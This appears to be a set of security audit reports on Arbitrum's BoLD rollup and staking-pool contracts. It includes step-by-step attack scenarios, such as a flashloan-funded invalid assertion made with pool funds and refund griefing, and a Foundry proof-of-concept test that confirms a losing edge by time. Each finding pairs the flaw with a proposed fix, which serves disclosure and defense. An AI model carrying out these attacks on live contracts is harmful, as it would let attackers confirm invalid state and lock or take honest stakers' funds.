Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AbsBoldStakingPool.sol#L41-L54

Vulnerability details

Impact

Stakers to a pool are not treated equally when their edge gets slashed. Some will be able to receive the full amount they deposited, while others receive nothing.

Proof of Concept

EdgeStakingPool and AssertionStakingPool inherit AbsBoldStakingPool. They allow users to pool resources together to make assertions and edges.
Looking at AbsBoldStakingPool#withdrawFromPool, we can see that depositors are allowed to withdraw the full amount they deposited, even though the edge they staked on got slashed:

    function withdrawFromPool(uint256 amount) public {
        if (amount == 0) {
            revert ZeroAmount();
        }
        uint256 balance = depositBalance[msg.sender];
        if (amount > balance) {
            revert AmountExceedsBalance(msg.sender, amount, balance);
        }

        depositBalance[msg.sender] = balance - amount;
        IERC20(stakeToken).safeTransfer(msg.sender, amount);//@audit-info some depositors will be cheated if edge or assertion(?) gets slashed

        emit StakeWithdrawn(msg.sender, amount);
    }

So let's say 10 people contribute $10 each to an EdgeStakingPool, and the stake required to make an edge is $50.
If the edge they made gets invalidated, the $50 stake is lost; the first 5 users to withdraw will receive their full $10, while the other 5 get nothing.

Tools Used

Manual Review

Recommended Mitigation Steps

Losses from losing an assertion or edge should be socialized among all depositors to a pool.
The staking pools should employ a shares mechanism, where each depositor can withdraw their share of the total remaining value of the pool.
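As a sketch of that recommendation (a hypothetical Python model, not the audited contracts): deposits mint shares, and withdrawals pay out pro rata against whatever balance the pool still holds, so a slash is borne equally by everyone.

```python
class SharesPool:
    """Toy model of a shares-based staking pool (assumed design, not the audited code)."""

    def __init__(self):
        self.total_shares = 0
        self.balance = 0   # tokens currently held by the pool
        self.shares = {}   # depositor -> shares

    def deposit(self, who, amount):
        # mint shares proportional to the pool's current value
        minted = amount if self.total_shares == 0 else amount * self.total_shares // self.balance
        self.shares[who] = self.shares.get(who, 0) + minted
        self.total_shares += minted
        self.balance += amount

    def slash(self, amount):
        # stake lost when the pool's edge/assertion is invalidated
        self.balance -= amount

    def withdraw_all(self, who):
        # pay out pro rata: every depositor bears the loss equally
        s = self.shares.pop(who)
        out = self.balance * s // self.total_shares
        self.total_shares -= s
        self.balance -= out
        return out

pool = SharesPool()
for i in range(10):
    pool.deposit(f"user{i}", 10)   # 10 depositors, $10 each
pool.slash(50)                     # the $50 edge stake is lost
payouts = [pool.withdraw_all(f"user{i}") for i in range(10)]
# every depositor recovers $5, instead of 5 users getting $10 and 5 getting $0
```

With the example above (10 depositors, $50 slashed), each depositor recovers $5 regardless of withdrawal order.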

Assessed type

Error

A malicious validator can prevent the upgrade by creating an assertion on the old Nitro rollup

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/BOLDUpgradeAction.sol#L357

Vulnerability details

Impact

The BoLD upgrade action will fail

Proof of Concept

The BoLD upgrade is processed via BOLDUpgradeAction.sol, which is called through delegatecall from governance.
During the upgrade process, it pauses the old Nitro rollup contract and force-refunds all stakes in the contract before the upgrade.

function cleanupOldRollup() private {
    IOldRollupAdmin(address(OLD_ROLLUP)).pause();
    // ...
    for (uint64 i = 0; i < stakerCount; i++) {
        // ...
        IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
        // ...
    }
    // ...
}

The pause is only invoked during the upgrade itself, which means validators can still create an assertion on the old Nitro contract beforehand.
If any validator creates an assertion and enters a challenge before the upgrade happens, forceRefundStaker will revert and prevent the upgrade, as the code snippet below shows (Nitro's RollupAdminLogic.sol:L276).

function forceRefundStaker(address[] calldata staker) external override whenPaused {
    require(staker.length > 0, "EMPTY_ARRAY");
    for (uint256 i = 0; i < staker.length; i++) {
        require(_stakerMap[staker[i]].currentChallenge == NO_CHAL_INDEX, "STAKER_IN_CHALL");
        reduceStakeTo(staker[i], 0);
        turnIntoZombie(staker[i]);
    }
    emit OwnerFunctionCalled(22);
}

The call reverts because the staker has an ongoing challenge (currentChallenge != NO_CHAL_INDEX).

Tools Used

Manual Review

Recommended Mitigation Steps

Rather than pausing and force-refunding all stakes in the Nitro contract, the upgrade should move the old Nitro rollup to a patched contract that allows existing stakers to withdraw their stakes by themselves.

Assessed type

DoS

A flaw in the time confirmation mechanism enables the confirmation of erroneous edges.

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L520-L531
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L689-L710

Vulnerability details

Impact

An attacker can exploit a vulnerability in the confirmation by time algorithm to confirm incorrect edges, leading to the confirmation of erroneous assertions.

Proof of Concept

There are two methods available for confirming an edge. Stakers can either bisect the edge until a one-step proof can be obtained and executed, or they can wait until the time threshold has been reached and confirm an unrivaled edge.

The confirmation by time algorithm involves two methods: updateTimerCacheByChildren and updateTimerCacheByClaim. These methods are responsible for updating the unrivaled time cache of edges in a chain.

    /// @inheritdoc IEdgeChallengeManager
    function multiUpdateTimeCacheByChildren(bytes32[] calldata edgeIds) public {
        for (uint256 i = 0; i < edgeIds.length; i++) {
            (bool updated, uint256 newValue) = store.updateTimerCacheByChildren(edgeIds[i]);
            if (updated) emit TimerCacheUpdated(edgeIds[i], newValue);
        }
    }

    /// @inheritdoc IEdgeChallengeManager
    function updateTimerCacheByChildren(bytes32 edgeId) public {
        (bool updated, uint256 newValue) = store.updateTimerCacheByChildren(edgeId);
        if (updated) emit TimerCacheUpdated(edgeId, newValue);
    }

If the assertion has edges at multiple levels, each of them must update its unrivaled time cache via updateTimerCacheByClaim.

    /// @inheritdoc IEdgeChallengeManager
    function updateTimerCacheByClaim(bytes32 edgeId, bytes32 claimingEdgeId) public {
        (bool updated, uint256 newValue) = store.updateTimerCacheByClaim(edgeId, claimingEdgeId, NUM_BIGSTEP_LEVEL);
        if (updated) emit TimerCacheUpdated(edgeId, newValue);
    }

The algorithm relies on accumulating enough unrivaled time to pass the confirmation threshold.

    function confirmEdgeByTime(
        EdgeStore storage store,
        bytes32 edgeId,
        uint64 claimedAssertionUnrivaledBlocks,
        uint64 confirmationThresholdBlock
    ) internal returns (uint256) {
        if (!store.edges[edgeId].exists()) {
            revert EdgeNotExists(edgeId);
        }

        uint256 totalTimeUnrivaled = timeUnrivaledTotal(store, edgeId);
        totalTimeUnrivaled += claimedAssertionUnrivaledBlocks;

>>      if (totalTimeUnrivaled < confirmationThresholdBlock) {
            revert InsufficientConfirmationBlocks(totalTimeUnrivaled, confirmationThresholdBlock);
        }

        // we also check the edge is pending in setConfirmed()
        store.edges[edgeId].setConfirmed();

        // also checks that no other rival has been confirmed
        setConfirmedRival(store, edgeId);

        return totalTimeUnrivaled;
    }

The issue arises in the updateTimerCacheByClaim method, where a "bad" edge can inherit unrivaled time from a "good" edge. This occurs when the function adds the cached time of a lower-level edge to the total unrivaled time of the current edge.

    function updateTimerCacheByClaim(
        EdgeStore storage store,
        bytes32 edgeId,
        bytes32 claimingEdgeId,
        uint8 numBigStepLevel
    ) internal returns (bool, uint256) {
        // calculate the time unrivaled without inheritance
        uint256 totalTimeUnrivaled = timeUnrivaled(store, edgeId);
>>      checkClaimIdLink(store, edgeId, claimingEdgeId, numBigStepLevel);
        totalTimeUnrivaled += store.edges[claimingEdgeId].totalTimeUnrivaledCache;
        return updateTimerCache(store, edgeId, totalTimeUnrivaled);
    }

Let's take a closer look at checkClaimIdLink:

    function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel)
        private
        view
    {
        // we do some extra checks that edge being claimed is eligible to be claimed by the claiming edge
        // these shouldn't be necessary since it should be impossible to add layer zero edges that do not
        // satisfy the checks below, but we conduct these checks anyway for double safety

        // the origin id of an edge should be the mutual id of the edge in the level below
        if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId);
        }
        // the claiming edge must be exactly one level below
        if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
    }

The validation ensures that claimingEdge is exactly one level below edgeId and that its originId equals edgeId.mutualId(). However, rival edges all share the same mutualId, so a claiming edge's originId matches the mutualId of every rival at the level above, not just the edge it actually claims. This allows the check to be exploited: passing a "bad" rival as edgeId still passes validation, letting the "bad" edge inherit the cached time accumulated by the "good" edge's claiming edge.
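The bypass can be illustrated with a small Python model (a simplified, hypothetical sketch of the Solidity logic, not the audited code): because the "good" edge and its "bad" rival share a mutual id, the link check accepts either as the parent of the honest claiming edge.

```python
from dataclasses import dataclass

@dataclass
class Edge:
    origin_id: tuple
    start: str
    end: str          # rivals differ only in this field; we reuse it as the edge id
    level: int
    claim_id: str = ""
    timer_cache: int = 0

    def mutual_id(self):
        # rival edges agree on level, origin and start commitment
        return (self.level, self.origin_id, self.start)

def check_claim_id_link(edge, claiming, check_claim=False):
    """Simplified mirror of checkClaimIdLink; check_claim=True models the proposed fix."""
    if edge.mutual_id() != claiming.origin_id:
        raise ValueError("OriginIdMutualIdMismatch")
    if edge.level + 1 != claiming.level:
        raise ValueError("EdgeLevelInvalid")
    if check_claim and claiming.claim_id != edge.end:
        raise ValueError("ClaimIdInvalid")

good = Edge(origin_id=("root",), start="s", end="good", level=0)
bad  = Edge(origin_id=("root",), start="s", end="bad",  level=0)  # rival of `good`
# honest lower-level edge claiming the *good* edge, with a large accumulated timer cache
lower = Edge(origin_id=good.mutual_id(), start="s0", end="e0",
             level=1, claim_id=good.end, timer_cache=2**32)

check_claim_id_link(good, lower)      # passes, as intended
check_claim_id_link(bad, lower)       # also passes: rivals share the same mutual id
bad.timer_cache += lower.timer_cache  # the "bad" edge inherits the honest edge's time
```

With the extra claim-id check modeled by check_claim=True, the honest link still passes while the rival link reverts.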

To exploit this vulnerability, an attacker can create a "bad" assertion and initiate a dispute between two edges, where one edge is "good" and the other is "bad". After some bisecting and the creation of edges at the new levels, the attacker stops responding, leading honest validators to believe that they can win the dispute by waiting for the confirmation threshold to pass.

Once the confirmation threshold has passed, the attacker, front-running the honest validator, executes a chain of time cache updates starting from the "good" edge. By accumulating time from the "good" edge, the attacker can confirm their "bad" edge and validate the erroneous assertion.

Coded POC for EdgeChallengeManager.t.sol

    function testCanConfirmByClaimSubChallenge() public {
        EdgeInitData memory ei = deployAndInit();
        (
            bytes32[] memory blockStates1,
            bytes32[] memory blockStates2,
            BisectionChildren[6] memory blockEdges1,
            BisectionChildren[6] memory blockEdges2
        ) = createBlockEdgesAndBisectToFork(
            CreateBlockEdgesBisectArgs(
                ei.challengeManager,
                ei.a1,
                ei.a2,
                ei.a1State,
                ei.a2State,
                false,
                a1RandomStates,
                a1RandomStatesExp,
                a2RandomStates,
                a2RandomStatesExp
            )
        );

        BisectionData memory bsbd = createMachineEdgesAndBisectToFork(
            CreateMachineEdgesBisectArgs(
                ei.challengeManager,
                1,
                blockEdges1[0].lowerChildId,
                blockEdges2[0].lowerChildId,
                blockStates1[1],
                blockStates2[1],
                false,
                ArrayUtilsLib.slice(blockStates1, 0, 2),
                ArrayUtilsLib.slice(blockStates2, 0, 2)
            )
        );

        BisectionData memory ssbd = createMachineEdgesAndBisectToFork(
            CreateMachineEdgesBisectArgs(
                ei.challengeManager,
                2,
                bsbd.edges1[0].lowerChildId,
                bsbd.edges2[0].lowerChildId,
                bsbd.states1[1],
                bsbd.states2[1],
                true,
                ArrayUtilsLib.slice(bsbd.states1, 0, 2),
                ArrayUtilsLib.slice(bsbd.states2, 0, 2)
            )
        );

        _safeVmRoll(block.number + challengePeriodBlock);

        BisectionChildren[] memory allWinners =
            concat(concat(toDynamic(ssbd.edges1), toDynamic(bsbd.edges1)), toDynamic(blockEdges1));
        // Bad edges
        BisectionChildren[] memory allLoosers =
            concat(concat(toDynamic(ssbd.edges2), toDynamic(bsbd.edges2)), toDynamic(blockEdges2));

        // Bad validator accumulates time for good edges
        ei.challengeManager.updateTimerCacheByChildren(allWinners[0].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allWinners[0].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allWinners[1].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allWinners[1].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allWinners[2].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allWinners[2].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allWinners[3].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allWinners[3].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allWinners[4].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allWinners[4].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allWinners[5].lowerChildId);

        // But when moving to another level he claims the timer cache for the bad edge
        ei.challengeManager.updateTimerCacheByClaim(allLoosers[6].lowerChildId, allWinners[5].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[6].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[7].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[7].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[8].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[8].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[9].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[9].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[10].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[10].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[11].lowerChildId);

        ei.challengeManager.updateTimerCacheByClaim(allLoosers[12].lowerChildId, allLoosers[11].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[12].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[13].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[13].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[14].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[14].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[15].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[15].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(allLoosers[16].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(allLoosers[16].upperChildId);

        // Bad edge won the dispute by time
        ei.challengeManager.confirmEdgeByTime(allLoosers[17].lowerChildId, ei.a1Data);

        assertTrue(
            ei.challengeManager.getEdge(allLoosers[17].lowerChildId).status == EdgeStatus.Confirmed, "Edge confirmed"
        );
    }

Tools Used

Foundry

Recommended Mitigation Steps

One of the steps to prevent this vulnerability would be to validate the claimId in the checkClaimIdLink function.

    function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel)
        private
        view
    {
        if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId);
        }
        // the claiming edge must be exactly one level below
        if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
+       // the claiming edge claimId must be the edgeId
+       if (store.edges[claimingEdgeId].claimId != edgeId) {
+           revert ClaimIdInvalid();
+       }
    }

Assessed type

Invalid Validation

An invalid assertion can get confirmed, even when there are honest participants

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L826-L830
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L529

Vulnerability details

Impact

Even though an assertion is invalid, an adversary can get it confirmed just because some states within it were valid.
Note that even if an honest party later proves that one of the states was invalid, it is irrelevant, because the adversary's block-level edge has already been confirmed and its timer set to max uint64.

Proof of Concept

Normally, if there are two rival assertions, the honest participant is expected to bisect his edge to the exact point where he disagrees with the adversary, and then oneStepProve that executing a step on the prevState (which everyone agrees on) yields the state that he claimed.

Once the honest participant does that, he can then:

  • confirmEdgeByOneStepProof, which updates the timerCache of the proven singleStepEdge to uint64.max.
  • updateTimerCacheByClaim, which allows him to recursively update the timerCache of the parent levels (until he reaches the block level) to the timerCache of the singleStepEdge (i.e. uint64.max):

function updateTimerCacheByClaim(
    EdgeStore storage store,
    bytes32 edgeId,
    bytes32 claimingEdgeId,
    uint8 numBigStepLevel
) internal returns (bool, uint256) {
    // calculate the time unrivaled without inheritance
    uint256 totalTimeUnrivaled = timeUnrivaled(store, edgeId);
    checkClaimIdLink(store, edgeId, claimingEdgeId, numBigStepLevel);
@>  totalTimeUnrivaled += store.edges[claimingEdgeId].totalTimeUnrivaledCache;
    return updateTimerCache(store, edgeId, totalTimeUnrivaled);
}

  • confirmEdgeByTime for the block-level edge, which checks that the edge's timerCache (in this case, uint64.max) is greater than confirmationThresholdBlocks.
  • Now the block-level edge is confirmed, so he can confirmAssertion in the assertion chain after confirmPeriodBlocks.

But the issue is that the adversary can create an invalid assertion, bisect it to a point where it was valid, and perform the steps outlined above.

For example,

  • Honest party assertion claim state = ABCDEFGH
  • Adversary claim state=ABCDEFGZ
  • Adversary bisects his edge to the point where he is able to prove that SmallStepEdge B transitions to C
  • Adversary calls confirmEdgeByOneStepProof to confirm his SmallStepEdge
  • Adversary calls updateTimerCacheByClaim repeatedly until he reaches his Block Edge
  • Adversary confirmEdgeByTime of his block edge, and would be able to confirmAssertion in the assertionChain after confirmPeriodBlocks

Tools Used

Manual Review

Recommended Mitigation Steps

One-step proving an edge should not immediately make the parent block edge confirmable, as the bigger picture may be invalid.
Only parties that were able to oneStepProve all the singleStepEdges requested by other rivals should, after the confirmationThresholdBlocks, be allowed to updateTimerCacheByClaim and confirmEdgeByTime.

Assessed type

Context

Staked amounts on layer zero edges could be stuck or even lost for honest challengers

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/EdgeChallengeManager.sol#L580-L582

Vulnerability details

Impact

Honest parties who created edge challenges cannot get a refund if the stake token or amount is zeroed out. As a result, the funds are stuck, or even lost if the stake token or amount is later set again by deploying a new challenge manager (see the PoC below for how a malicious party can exploit this).

Proof of Concept

When a zero layer edge is created, a stake amount must be transferred:

	st.safeTransferFrom(msg.sender, receiver, sa);

EdgeChallengeManager.sol:L434

The amounts are stored in stakeAmounts[], which are set upon challenge manager deployment. Note that staking can be disabled by setting the token or stakeAmounts to zero; to do this, a new challenge manager needs to be deployed and its address updated in the assertion chain.

However, when this is done (e.g. stakeAmounts are zeroed), honest participants will no longer be able to get their stake refunded, because of this check:

	if (address(st) != address(0) && sa != 0) {
		st.safeTransfer(edge.staker, sa);
	}

EdgeChallengeManager.sol:L580-L582

As a result, any unclaimed stakes by honest participants will be lost.

Furthermore, to turn this into an attack, a malicious party can wait until the token or stakeAmounts are zero and call refundStake for all honest participants (with confirmed edges). This is possible since anyone can call refundStake for any edge. Their edges are then marked as refunded even though they received nothing:

 edge.setRefunded();

EdgeChallengeManager.sol:L575-L576
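The griefing path can be modeled with a short Python sketch (a hypothetical simplification of refundStake, not the audited code): the edge is marked refunded first, and the transfer is silently skipped when the stake configuration is zeroed, so an attacker can "refund" everyone for nothing.

```python
class Edge:
    def __init__(self, staker):
        self.staker = staker
        self.refunded = False

def refund_stake(edge, stake_token, stake_amount, balances):
    # permissionless: anyone may call it for any edge, as in EdgeChallengeManager
    if edge.refunded:
        raise ValueError("EdgeAlreadyRefunded")
    edge.refunded = True  # state is set first...
    # ...but the transfer only happens when token and amount are non-zero
    if stake_token is not None and stake_amount != 0:
        balances[edge.staker] = balances.get(edge.staker, 0) + stake_amount

balances = {}
edge = Edge(staker="honest")
# the stake amount has been zeroed out; the attacker "refunds" the honest staker's edge
refund_stake(edge, stake_token="BOLD", stake_amount=0, balances=balances)
assert edge.refunded and balances.get("honest", 0) == 0  # flag set, nothing paid
# even if the amount is restored later, the honest staker can no longer refund
```

A second call for the same edge reverts with EdgeAlreadyRefunded, which is exactly why the honest staker is permanently locked out.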

Tools Used

Manual analysis

Recommended Mitigation Steps

refundStake shouldn't be permission-less, only the staker should be allowed to call it.

Assessed type

Other

Old rollup stakers beyond the first 50 may lose their stake when upgrading to the new rollup

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/265c57800145734362a4bb1b46465ff35b47beac/src/rollup/BOLDUpgradeAction.sol#L341

Vulnerability details

Impact

Some stakers in the old rollup will lose their stake when upgrading to the new rollup.

Proof of Concept

During the BoLD upgrade, the perform function calls cleanupOldRollup to clean up the old rollup.
The staker count is capped at a magic number, 50; if the actual staker count is greater than 50, the remaining stakers will lose their stake when upgrading to the new rollup.
The rollup logic contains no check ensuring the staker count is at most 50, so it is possible to lose stakes during the upgrade.

   function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

        uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
 @>       if (stakerCount > 50) {
            stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

        // upgrade the rollup to one that allows validators to withdraw even whilst paused
        DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER);
    }

Tools Used

Manual review

Recommended Mitigation Steps

Add a check to ensure the staker count is at most 50 before upgrading to the new rollup, or remove the magic number 50 and refund all stakers.
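One possible shape for the latter fix (a hypothetical Python sketch of the loop logic, not the audited Solidity): refund stakers in bounded batches until none remain, instead of silently capping at 50.

```python
def cleanup_old_rollup(stakers, batch_size=50):
    """Refund *all* stakers in bounded batches instead of silently capping at 50.

    `stakers` models the old rollup's staker list; refunding removes a staker
    from the list (as forceRefundStaker turns them into zombies on-chain).
    Hypothetical sketch, not the audited code.
    """
    refunded = []
    while stakers:
        batch = stakers[:batch_size]
        del stakers[:batch_size]  # refunded stakers drop out of the staker list
        refunded.extend(batch)
    return refunded

stakers = [f"staker{i}" for i in range(120)]
refunded = cleanup_old_rollup(stakers)
assert len(refunded) == 120 and not stakers  # nobody is left behind
```

On-chain this would naturally be split across multiple transactions (one batch per call) to stay within the block gas limit; the sketch only shows that the loop terminates once the staker list is empty rather than at an arbitrary cap.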

Assessed type

Invalid Validation

Undesirable behaviour in the event of a fork immediately after BOLD upgrade

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L62

Vulnerability details

In the contract RollupUserLogic, the function removeWhitelistAfterValidatorAfk() checks the number of blocks since the last confirmed assertion before the validator whitelist is removed, configured as 28 days. validatorWhitelistDisabled can be set to true only after this 28-day period has passed (after which the validators are considered AFK).

However, the same check is missing in removeWhitelistAfterFork(). There, the only check is whether the chain id differs from deployTimeChainId.
If there is a fork just after the BOLD upgrade and before the 28 days have passed, anyone can trigger this function to set validatorWhitelistDisabled to true, opening the protocol to permissionless validators.

This is not desirable and causes undesired behaviour in the protocol's assertion/validation logic.

Proof of Concept

Contract : RollupUserLogic.sol
Function : removeWhitelistAfterFork()

Recommended Mitigation Steps

Add similar check to the function removeWhitelistAfterFork().

    function removeWhitelistAfterFork() external {
        require(!validatorWhitelistDisabled, "WHITELIST_DISABLED");
        require(_chainIdChanged(), "CHAIN_ID_NOT_CHANGED");
++      require(_validatorIsAfk(), "VALIDATOR_NOT_AFK");
        validatorWhitelistDisabled = true;
    }

Assessed type

Invalid Validation

Creating invalid assertion using honest parties' staked funds

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AssertionStakingPool.sol#L40

Vulnerability details

Impact

An attacker can create an invalid assertion without risking his own funds, locking the honest parties' staked funds instead.

Proof of Concept

Attack explanation in general

  1. A valid assertion is already confirmed, called A. So we have the following assertion tree:
 A ---------------------> 
 valid                                 
 confirmed                           
 assertion              
  2. An AssertionStakingPool contract is already created with its immutable assertionHash equal to zero. When the staked amount in this contract reaches the requiredStake amount, it creates a valid assertion. I am assuming all the participants in this staking pool are honest. So we have:
A ---------------------> B ----------------->
valid                  valid               
confirmed              pending             
assertion              assertion
                       staker:
                       AssertionStakingPool
  3. After some time (note that assertion B is not confirmed yet), the attacker takes a flashloan and creates an invalid assertion, called C, as a child of assertion B. So we will have the following assertion tree:
A ---------------------> B -------------------------> C ------------------------->
valid                  valid                       invalid                     
confirmed              pending                     pending                     
assertion              assertion                   assertion                   
                       staker:                     staker:                     
                       AssertionStakingPool        Attacker                           
  4. Since assertion B now has a child, its staker (the staking pool) is considered an inactive staker. So the attacker, in the same transaction, calls makeStakeWithdrawableAndWithdrawBackIntoPool in the AssertionStakingPool contract. By doing so, all the staked amount returns to the pool.
  5. In the same transaction, the attacker, using the available amount in the AssertionStakingPool contract, creates another invalid assertion, called D, as a child of assertion C. In other words, the attacker calls createAssertion in the AssertionStakingPool contract to create a new invalid assertion. So we will have:
A ---------------------> B -------------------------> C -------------------------> D ----------------->
valid                  valid                       invalid                     invalid
confirmed              pending                     pending                     pending
assertion              assertion                   assertion                   assertion
                       staker:                     staker:                     staker:
                       AssertionStakingPool        Attacker                    AssertionStakingPool
  6. Since assertion C now has a child, the attacker (the staker of assertion C) can withdraw his deposited amount and repay the flashloan.

Notes:

  • The attacker could create two invalid assertions without risking his own funds.
  • The attacker wasted the funds staked in the AssertionStakingPool contract, because assertions C and D will be challenged by honest parties and rejected in the end. Therefore, the stake behind assertion D will be locked. This locked stake was owned by the honest stakers in the AssertionStakingPool. In other words, honest parties who staked to create the valid assertion B are now fined for the creation of the invalid assertion D.

Attack explanation in details

  • In step 2, it is assumed that the deployed AssertionStakingPool contract has zero immutable assertionHash.
  bytes32 public immutable assertionHash;
  constructor(
      address _rollup,
      bytes32 _assertionHash
  ) AbsBoldStakingPool(IRollupCore(_rollup).stakeToken()) {
      rollup = _rollup;
      assertionHash = _assertionHash;
  }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AssertionStakingPool.sol#L36

Having this immutable equal to zero allows any user to call createAssertion with arbitrary data assertionInput as the input parameter, once the total staked amount reaches the requiredStake threshold. In this scenario, it is assumed the honest parties provided valid input to create the valid assertion B; later, the attacker abuses this opportunity and provides malicious input to create the invalid assertion D.

  function createAssertion(AssertionInputs calldata assertionInputs) external {
      uint256 requiredStake = assertionInputs.beforeStateData.configData.requiredStake;
      // approve spending from rollup for newStakeOnNewAssertion call
      IERC20(stakeToken).safeIncreaseAllowance(rollup, requiredStake);
      // reverts if pool doesn't have enough stake and if assertion has already been asserted
      IRollupUser(rollup).newStakeOnNewAssertion(requiredStake, assertionInputs, assertionHash, address(this));
  }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AssertionStakingPool.sol#L40

When the immutable assertionHash is zero, the parameter expectedAssertionHash in the subsequent functions is also zero, which bypasses the check between the expected assertion hash and the newly created assertion hash.

  function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
      public
      onlyValidator
      whenNotPaused
  {
      //.....
      require(
          expectedAssertionHash == bytes32(0)
              || getAssertionStorage(expectedAssertionHash).status == AssertionStatus.NoAssertion,
          "EXPECTED_ASSERTION_SEEN"
      );
      //.....
      (bytes32 newAssertionHash, bool overflowAssertion) =
          createNewAssertion(assertion, prevAssertion, expectedAssertionHash);
      //.....
  }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L163

    function createNewAssertion(
        AssertionInputs calldata assertion,
        bytes32 prevAssertionHash,
        bytes32 expectedAssertionHash
    ) internal returns (bytes32 newAssertionHash, bool overflowAssertion) {
        //.....
        require(
            newAssertionHash == expectedAssertionHash || expectedAssertionHash == bytes32(0),
            "UNEXPECTED_ASSERTION_HASH"
        );
        //.....
    }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L478
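The effect of the zero hash can be modeled in a few lines of Python (a sketch of the require in createNewAssertion, not the Solidity code; the hash values are illustrative stand-ins):

```python
ZERO_HASH = "0x00"

def assertion_hash_check_passes(new_assertion_hash, expected_assertion_hash):
    # Mirrors the require in createNewAssertion: a zero expected hash
    # disables the comparison entirely.
    return (new_assertion_hash == expected_assertion_hash
            or expected_assertion_hash == ZERO_HASH)

# With a real expected hash, only the matching assertion passes.
print(assertion_hash_check_passes("0xB", "0xB"))   # True
print(assertion_hash_check_passes("0xD", "0xB"))   # False

# With the pool's immutable assertionHash == 0, ANY assertion passes,
# including the attacker's invalid assertion D.
print(assertion_hash_check_passes("0xD", ZERO_HASH))  # True
```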

